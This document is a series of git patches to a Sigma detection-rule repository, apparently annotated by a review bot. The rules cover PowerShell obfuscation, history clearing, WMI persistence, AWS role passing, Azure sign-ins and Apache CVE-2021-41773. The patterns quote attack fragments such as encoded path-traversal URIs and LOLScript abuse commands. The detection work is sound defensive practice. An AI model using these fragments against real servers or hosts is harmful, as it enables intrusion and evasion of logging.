a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml index 9faa95df..1ba4b73e 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 
diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml index bff58af6..ccbd2b9a 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml index ef94a8c3..d5715369 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml index 6e5b5d32..3c823c36 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 
diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml index aecbcfcf..791c900b 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabledd + definition: PowerShell Module Logging must be enabledd detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml index e97a7449..3c12fe92 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml index 4273a271..2b78501f 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabledd + definition: PowerShell Module Logging must be enabledd detection: selection_4103: EventID: 4103 
diff --git a/rules/windows/powershell/powershell_module/powershell_powercat.yml b/rules/windows/powershell/powershell_module/powershell_powercat.yml index 3feb349e..649381c9 100644 --- a/rules/windows/powershell/powershell_module/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_module/powershell_powercat.yml @@ -15,7 +15,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml index 39a6161c..4bd6369c 100644 --- a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml index 18f9e127..c6571b75 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabledd + definition: PowerShell Module Logging must be enabledd detection: selection_id: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml index 761d66b5..6e9268e7 100644 
--- a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml @@ -16,7 +16,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabledd + definition: PowerShell Module Logging must be enabledd detection: selection_4103: EventID: 4103 From 195db4cffcf0ed296da4430e4b70f0a987e20574 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 9 Oct 2021 18:48:02 +0200 Subject: [PATCH 1197/1367] refactor: made Apache RCE rule more robust --- .../web_cve_2021_41773_apache_path_traversal.yml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/rules/web/web_cve_2021_41773_apache_path_traversal.yml b/rules/web/web_cve_2021_41773_apache_path_traversal.yml index 04ab1634..a28a05f8 100644 --- a/rules/web/web_cve_2021_41773_apache_path_traversal.yml +++ b/rules/web/web_cve_2021_41773_apache_path_traversal.yml @@ -11,14 +11,18 @@ references: - https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/h4x0r_dz/status/1445401960371429381 - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-41773.yaml - - https://twitter.com/bl4sty/status/1445462677824761878?s=12 + - https://twitter.com/bl4sty/status/1445462677824761878 logsource: category: webserver detection: selection: c-uri|contains: - - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e' - - '/icons/.%2e/%2e%2e/%2e%2e/%2e%2e' + - '/cgi-bin/.%2e/' + - '/icons/.%2e/' + - '/cgi-bin/.%%32%65/' + - '/icons/.%%32%65/' + - '/cgi-bin/.%%%25%33' + - '/icons/.%%%25%33' selection_success: sc-status: - 200 @@ -29,5 +33,4 @@ false_positives: tags: - attack.initial_access - attack.t1190 -level: critical - +level: high From de52890a628b3cfb148c461716df341278ab4879 Mon Sep 17 00:00:00 2001 
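Review bot: The detection change in the web_cve_2021_41773_apache_path_traversal.yml hunk is not accompanied by a `modified:` date, which other rule edits in this series add when detection logic changes (see the `+modified: 2021/10/10` line in the sysmon_vmtoolsd_susp_child_process.yml commit below); the rule header is outside the hunk, so this only applies if the field is not updated there. The shortened patterns (`'/cgi-bin/.%2e/'`, `'/icons/.%2e/'` and the doubly encoded forms) match far more requests than the four-segment originals, so the rule now relies on `selection_success` and the condition, which sits outside the hunk, to keep noise down. A one-line comment above the list, e.g. `# shorter prefixes on purpose: the sc-status filter below limits hits to successful requests`, would record that intent, and the `level` change from `critical` to `high` in the second hunk deserves a word of explanation in the commit description.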
From: Austin Songer Date: Sat, 9 Oct 2021 15:24:49 -0500 Subject: [PATCH 1198/1367] Update passed_role_to_glue_development_endpoint.yml --- rules/cloud/aws/passed_role_to_glue_development_endpoint.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml index b57a5500..dfc15fc6 100644 --- a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml +++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml @@ -16,7 +16,7 @@ detection: selection2: eventSource: glue.amazonaws.com eventName: CreateDevEndpoint - condition: all + condition: selection1 and selection2 level: low tags: - attack.privilege_escalation From 1987897a7653c5f1b9dbe0c103b9255f5cd7cde5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 9 Oct 2021 15:26:38 -0500 Subject: [PATCH 1199/1367] Update aws_pass_role_to_lambda_function.yml --- rules/cloud/aws/aws_pass_role_to_lambda_function.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml index 333b6596..3c38c959 100644 --- a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml +++ b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml @@ -18,7 +18,7 @@ detection: selection3: eventSource: lambda.amazonaws.com eventName: InvokeFunction - condition: all + condition: selection1 and selection2 and selection3 level: low tags: - attack.privilege_escalation From a241f526ef6bc52c8478e7a02dd5af1596daabba Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Sun, 10 Oct 2021 07:54:40 +0545 Subject: [PATCH 1200/1367] Added more strict path --- .../sysmon_vmtoolsd_susp_child_process.yml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) 
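Review bot: `condition: selection1 and selection2` in the passed_role_to_glue_development_endpoint.yml hunk can only fire when both selections hold on a single CloudTrail record; selection1 is outside the hunk, and if it pins `eventSource`/`eventName` to a different API call (a PassRole event, as the rule name suggests) the conjunction is unsatisfiable, because one record carries exactly one eventSource and one eventName. The same shape appears in `condition: selection1 and selection2 and selection3` in the aws_pass_role_to_lambda_function.yml hunk on this line, where selection3 already fixes `lambda.amazonaws.com` / `InvokeFunction`. If the intent is to correlate a PassRole call with the later CreateDevEndpoint/InvokeFunction call by the same principal, that needs an aggregation or a pair of rules rather than `and` on one event; if selection1 only constrains fields shared by both events, a comment such as `# selection1 must hold on the same record as selection2` would make that explicit.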
diff --git a/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml b/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml index 3a7ddb28..cdecb338 100644 --- a/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml +++ b/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml @@ -8,6 +8,7 @@ tags: - attack.t1059 author: behops, Bhabesh Raj date: 2021/10/08 +modified: 2021/10/10 references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ fields: @@ -32,8 +33,8 @@ detection: - '\cscript.exe' filter: CommandLine|contains: - - 'poweron-vm-default.bat' - - 'poweroff-vm-default.bat' - - 'resume-vm-default.bat' - - 'suspend-vm-default.bat' + - '\VMware\VMware Tools\poweron-vm-default.bat' + - '\VMware\VMware Tools\poweroff-vm-default.bat' + - '\VMware\VMware Tools\resume-vm-default.bat' + - '\VMware\VMware Tools\suspend-vm-default.bat' condition: selection and not filter From 1337116d840c6076cb1f6fa69ab1457384faaec4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 10 Oct 2021 10:17:24 +0200 Subject: [PATCH 1201/1367] Cleanup selection name --- .../powershell_clear_powershell_history.yml | 8 ++++---- .../powershell_module/powershell_decompress_commands.yml | 4 ++-- .../powershell_module/powershell_get_clipboard.yml | 4 ++-- .../powershell_invoke_obfuscation_obfuscated_iex.yml | 6 +++--- .../powershell_cl_invocation_lolscript_count.yml | 4 ++-- .../powershell_cl_mutexverifiers_lolscript_count.yml | 4 ++-- .../powershell_script/powershell_detect_vm_env.yml | 2 +- .../powershell_script/powershell_wmi_persistence.yml | 2 +- 8 files changed, 17 insertions(+), 17 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml index 63ab1d2d..46da86f6 100644 --- a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml 
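Review bot: The tightened `filter` in sysmon_vmtoolsd_susp_child_process.yml is still `CommandLine|contains`, so the exclusion applies to any command line that merely includes `\VMware\VMware Tools\poweron-vm-default.bat` somewhere in it, not only to an invocation whose script argument is that file; a longer path prefix narrows the legitimate case but does not change that property. If the intent is to exclude exactly the stock VMware scripts, consider a more anchored operator such as `CommandLine|endswith` (accounting for a possibly quoted path) or additionally constraining the interpreter `Image` in the filter. The `selection` block this filter is subtracted from starts outside the hunk, so the overall scope of the exclusion cannot be fully judged here.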
+++ b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml @@ -19,21 +19,21 @@ logsource: service: powershell definition: PowerShell Module Logging must be enabled detection: - selection_4: + selection_id: EventID: 4103 - selection_5: + selection_payload_1: Payload|contains: - 'del' - 'Remove-Item' - 'rm' Payload|contains|all: - '(Get-PSReadlineOption).HistorySavePath' - selection_6: + selection_payload_2: Payload|contains|all: - 'Set-PSReadlineOption' - '–HistorySaveStyle' - 'SaveNothing' - condition: selection_4 and ( selection_5 or selection_6 ) + condition: selection_id and ( selection_payload_1 or selection_payload_2 ) falsepositives: - Legitimate PowerShell scripts level: medium diff --git a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml index 675257bd..5107fd70 100644 --- a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml @@ -19,10 +19,10 @@ logsource: service: powershell definition: PowerShell Module Logging must be enabled detection: - selection2: + selection_4103: EventID: 4103 Payload|contains: 'Expand-Archive' - condition: selection2 + condition: selection_4103 falsepositives: - unknown level: informational \ No newline at end of file diff --git a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml index 58e7ce4f..832dab3d 100644 --- a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml 
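Review bot: In the renamed `selection_payload_2` of powershell_clear_powershell_history.yml the `Payload|contains|all` entry `'–HistorySaveStyle'` appears to begin with an en dash (U+2013) rather than an ASCII hyphen, so a payload written as `Set-PSReadlineOption -HistorySaveStyle SaveNothing` would fail the `all` and the rule would not fire; the defect predates the rename but the hunk carries it onto the new side. Replace it with `- '-HistorySaveStyle'`; if the non-ASCII form is deliberately covered because PowerShell also accepts en/em dashes as parameter prefixes, keep it as an additional entry in a separate OR-ed selection rather than inside the `all` list. Please confirm the actual byte in the file, since the dash could also be an artifact of how this patch was rendered.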
@@ -19,10 +19,10 @@ logsource: service: powershell definition: PowerShell Module Logging must be enabled detection: - selection2: + selection_4103: EventID: 4103 Payload|contains: 'Get-Clipboard' - condition: selection2 + condition: selection_4103 falsepositives: - unknown level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml index fe77d74d..e00f05f9 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -19,9 +19,9 @@ logsource: service: powershell definition: PowerShell Module Logging must be enabled detection: - selection_3: + selection_id: EventID: 4103 - selection_4: + selection_payload: - Payload|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - Payload|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - Payload|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' @@ -29,7 +29,7 @@ detection: - Payload|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - Payload|re: '\$VerbosePreference\.ToString\(' - Payload|re: '\String\]\s*\$VerbosePreference' - condition: selection_3 and selection_4 + condition: selection_id and selection_payload falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml index 246803a0..7bce506c 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml 
@@ -16,12 +16,12 @@ logsource: service: powershell definition: Script block logging must be enabled detection: - selection2: + selection: EventID: 4104 ScriptBlockText|contains: - 'CL_Invocation.ps1' - 'SyncInvoke' - condition: selection2 | count(ScriptBlockText) by Computer > 2 + condition: selection | count(ScriptBlockText) by Computer > 2 # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 # PS > SyncInvoke c:\Evil.exe falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml index cc7de5f4..ac2c9ed9 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml @@ -16,12 +16,12 @@ logsource: service: powershell definition: Script block logging must be enabled detection: - selection2: + selection: EventID: 4104 ScriptBlockText|contains: - 'CL_Mutexverifiers.ps1' - 'runAfterCancelProcess' - condition: selection2 | count(ScriptBlockText) by Computer > 2 + condition: selection | count(ScriptBlockText) by Computer > 2 # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 # PS > runAfterCancelProcess c:\Evil.exe falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml b/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml index 7b810af9..250b71fe 100644 --- a/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml +++ b/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml @@ -23,7 +23,7 @@ detection: ScriptBlockText|contains: - MSAcpi_ThermalZoneTemperature - Win32_ComputerSystem - condition: all of selection_* + condition: all of them falsepositives: - Unknown level: medium 
diff --git a/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml index 514bf453..03fa7e18 100644 --- a/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml +++ b/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml @@ -28,7 +28,7 @@ detection: - '-Namespace root/subscription ' - '-ClassName CommandLineEventConsumer ' - '-Property ' #is a variable name - condition: all of them + condition: selection_id and selection_ioc falsepositives: - Unknown level: medium \ No newline at end of file From 5fdaefc77d9755b8ce3effa79beaad4d04275726 Mon Sep 17 00:00:00 2001 From: Tran Trung Hieu Date: Sun, 10 Oct 2021 16:06:28 +0400 Subject: [PATCH 1202/1367] Azure Security Operations for Priveleged Accounts --- .DS_Store | Bin 0 -> 8196 bytes rules/cloud/azure/azure_account_lockout.yml | 18 ++++++++++++++ .../azure_change_to_authentication_method.yml | 19 +++++++++++++++ .../azure/azure_login_to_disabled_account.yml | 19 +++++++++++++++ rules/cloud/azure/azure_mfa_interrupted.yml | 22 ++++++++++++++++++ ...er_login_blocked_by_conditional_access.yml | 18 ++++++++++++++ 6 files changed, 96 insertions(+) create mode 100644 .DS_Store create mode 100644 rules/cloud/azure/azure_account_lockout.yml create mode 100644 rules/cloud/azure/azure_change_to_authentication_method.yml create mode 100644 rules/cloud/azure/azure_login_to_disabled_account.yml create mode 100644 rules/cloud/azure/azure_mfa_interrupted.yml create mode 100644 rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml 
diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..30ea1bff625721dfd93203ca5da6e267b24ba887 GIT binary patch literal 8196 zcmeHMzl#$=6n=B&mnhuXNXivNZS=g-ZtsY#%^`@5n#++BlG~7MY_!qz4($??I%x2&04>=nVb|%ccW!`)9ee+GS%i9o<+L#a4h`L17L1(*i z3`0p{KleggvNNY)74m5`T-)4=#*;#%pYRHJ1-t@Y0k42p;D1p7&ung;is!!Z`q3-k z6{w{Ge18bg*@o68#_C%K23-QcHZZLlu2=X1Hn29dHZc|+G-Xm@O{%gbhBE1x4{Tg$ zZDOoRCuNHdWs#MwP?Sc;`hgB76&mYDuYgyer~udQ4Z1)>x=pdH-__Mu-=uFG^?LnL z)W=-s&5g$g-M!E2u7B`H|70h7H=wTTR|M@8mv(4QeTfcI%UC@ZAvv6Su=M5UuTRXO z5S1~hj*@)rJ*!Py6wxllG=&;DKEpE_$%&AB?mvxFO>*muql`~=l*{J{z^DZlW4eX2 z*`}GJ&g$N?ykBy8ai^VXRK++vR(~*$CRB-WM%y%XShV){U9aTuVfkpvLF7vY z%ibo@%H(BV7D+hncfVVF>y`NHZy!ngMMU;nE01vS_3<(V-@F2~Q{af%ahL0V z{L-u5|JP0zzhSRHofJ@w-ezwDJ609D=2|;IzlqL`;}Tof2}{S^2OW??@L literal 0 HcmV?d00001 diff --git a/rules/cloud/azure/azure_account_lockout.yml b/rules/cloud/azure/azure_account_lockout.yml new file mode 100644 index 00000000..12ac7162 --- /dev/null +++ b/rules/cloud/azure/azure_account_lockout.yml @@ -0,0 +1,18 @@ +title: Account Lockout +id: 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + service: SigninLogs +detection: + selection: + ResultType: 50053 + condition: selection +level: medium +tags: + - attack.credential_access + - attack.t1110 diff --git a/rules/cloud/azure/azure_change_to_authentication_method.yml b/rules/cloud/azure/azure_change_to_authentication_method.yml new file mode 100644 index 00000000..171932f3 --- /dev/null +++ b/rules/cloud/azure/azure_change_to_authentication_method.yml 
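Review bot: azure_account_lockout.yml, like the other four new Azure rules in this patch (azure_change_to_authentication_method, azure_login_to_disabled_account, azure_mfa_interrupted, azure_user_login_blocked_by_conditional_access), has no `falsepositives:` section, unlike every other rule touched in this series; add at least `falsepositives:` / `  - Unknown`, or for this rule something more specific such as users retrying an old password after a rotation. `ResultType: 50053` is written as an integer, while Azure SigninLogs `ResultType` is commonly a string field — confirm the backend mapping tolerates that or quote the value as `'50053'`. Separately, the same commit adds `.DS_Store`, a macOS Finder artifact with no place in the repository; drop it from the patch and add it to `.gitignore`.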
@@ -0,0 +1,19 @@ +title: Change to Authentication Method +id: 4d78a000-ab52-4564-88a5-7ab5242b20c7 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + service: AuditLogs +detection: + selection: + LoggedByService: 'Authentication Methods' + Category: 'UserManagement' + OperationName: 'User registered security info' + condition: selection +level: medium +tags: + - attack.credential_access diff --git a/rules/cloud/azure/azure_login_to_disabled_account.yml b/rules/cloud/azure/azure_login_to_disabled_account.yml new file mode 100644 index 00000000..a89c07d5 --- /dev/null +++ b/rules/cloud/azure/azure_login_to_disabled_account.yml @@ -0,0 +1,19 @@ +title: Login to Disabled Account +id: 908655e0-25cf-4ae1-b775-1c8ce9cf43d8 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Detect failed attempts to sign in to disabled accounts. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + service: SigninLogs +detection: + selection: + ResultType: 50057 + ResultDescription: 'User account is disabled. The account has been disabled by an administrator.' + condition: selection +level: medium +tags: + - attack.initial_access + - attack.t1078 diff --git a/rules/cloud/azure/azure_mfa_interrupted.yml b/rules/cloud/azure/azure_mfa_interrupted.yml new file mode 100644 index 00000000..2f381252 --- /dev/null +++ b/rules/cloud/azure/azure_mfa_interrupted.yml 
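Review bot: The `description:` of azure_change_to_authentication_method.yml reads "could be an indicated of an attacker adding an auth method"; it should be `description: A change to the authentication method could be an indication of an attacker adding an authentication method to the account to retain access.` The rule also carries only the tactic tag `attack.credential_access` with no technique id, unlike the sibling rules in this patch; if a technique fits the registered-security-info event, add it for consistency.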
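Review bot: azure_login_to_disabled_account.yml matches `ResultDescription` against the full sentence `'User account is disabled. The account has been disabled by an administrator.'`, which is brittle — any wording change in the tenant's sign-in log text breaks the match even though `ResultType: 50057` already identifies the condition. Either drop the `ResultDescription` line and rely on the result code, or relax it to `ResultDescription|contains: 'disabled'` as the MFA rule in this same patch does with `|contains`.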
@@ -0,0 +1,22 @@ +title: Multifactor Authentication Interupted +id: 5496ff55-42ec-4369-81cb-00f417029e25 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + service: SigninLogs +detection: + selection: + ResultType: 50074 + ResultDescription|contains: 'Strong Auth required' + selection1: + ResultType: 500121 + ResultDescription|contains: 'Authentication failed during strong authentication request' + condition: selection or selection1 +level: medium +tags: + - attack.initial_access + - attack.t1078.004 diff --git a/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml b/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml new file mode 100644 index 00000000..3ac01e8c --- /dev/null +++ b/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml @@ -0,0 +1,18 @@ +title: User Access Blocked by Azure Conditional Access +id: 9a60e676-26ac-44c3-814b-0c2a8b977adf +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + service: SigninLogs +detection: + selection: + ResultType: 53003 + condition: selection +level: medium +tags: + - attack.credential_access + - attack.t1110 From 9810a9fe730f92f3c99188f493876abae3b42435 Mon Sep 17 00:00:00 2001 
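Review bot: The `title:` of azure_mfa_interrupted.yml misspells the last word; it should be `title: Multifactor Authentication Interrupted`. The two selections are named `selection` and `selection1`, which the "Cleanup selection name" commit earlier in this series moved away from for the PowerShell rules; naming them after what they match, e.g. `selection_50074` and `selection_500121` with `condition: 1 of selection_*`, would keep the new rules in line with that convention.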
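Review bot: The `description:` of azure_user_login_blocked_by_conditional_access.yml contains garbled text, "might be sights≈ of unauthorizeed login"; it should read `description: Detects access blocked by Conditional Access policies. The policy did not allow token issuance, which might be a sign of an unauthorized login attempt against a valid account.` The tags map the rule to `attack.t1110` (brute force), but what the description says is detected — a policy blocking a sign-in to a valid account — reads closer to `attack.t1078`; please confirm the intended mapping.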
From: frack113 Date: Mon, 11 Oct 2021 07:42:04 +0200 Subject: [PATCH 1203/1367] add powershell.yml --- tools/config/generic/powershell.yml | 44 +++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 tools/config/generic/powershell.yml diff --git a/tools/config/generic/powershell.yml b/tools/config/generic/powershell.yml new file mode 100644 index 00000000..23bc322e --- /dev/null +++ b/tools/config/generic/powershell.yml @@ -0,0 +1,44 @@ +title: Conversion of Generic Rules into Powershell Specific EventID Rules +order: 10 +logsources: + ps_module: + category: ps_module + product: windows + conditions: + EventID: 4103 + rewrite: + product: windows + service: powershell + ps_script: + category: ps_script + product: windows + conditions: + EventID: 4104 + rewrite: + product: windows + service: powershell + # for the "classic" channel + ps_classic_start: + category: ps_classic_start + product: windows + conditions: + EventID: 400 + rewrite: + product: windows + service: powershell-classic + ps_classic_provider_start: + category: ps_classic_provider_start + product: windows + conditions: + EventID: 600 + rewrite: + product: windows + service: powershell-classic + ps_classic_script: + category: ps_classic_script + product: windows + conditions: + EventID: 800 + rewrite: + product: windows + service: powershell-classic \ No newline at end of file From f1d5605f103f4635aceb894d6ad2c42ed3ea2885 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 11 Oct 2021 07:44:48 +0200 Subject: [PATCH 1204/1367] fix yml space --- tools/config/generic/powershell.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/tools/config/generic/powershell.yml b/tools/config/generic/powershell.yml index 23bc322e..6f8f3828 100644 --- a/tools/config/generic/powershell.yml +++ b/tools/config/generic/powershell.yml 
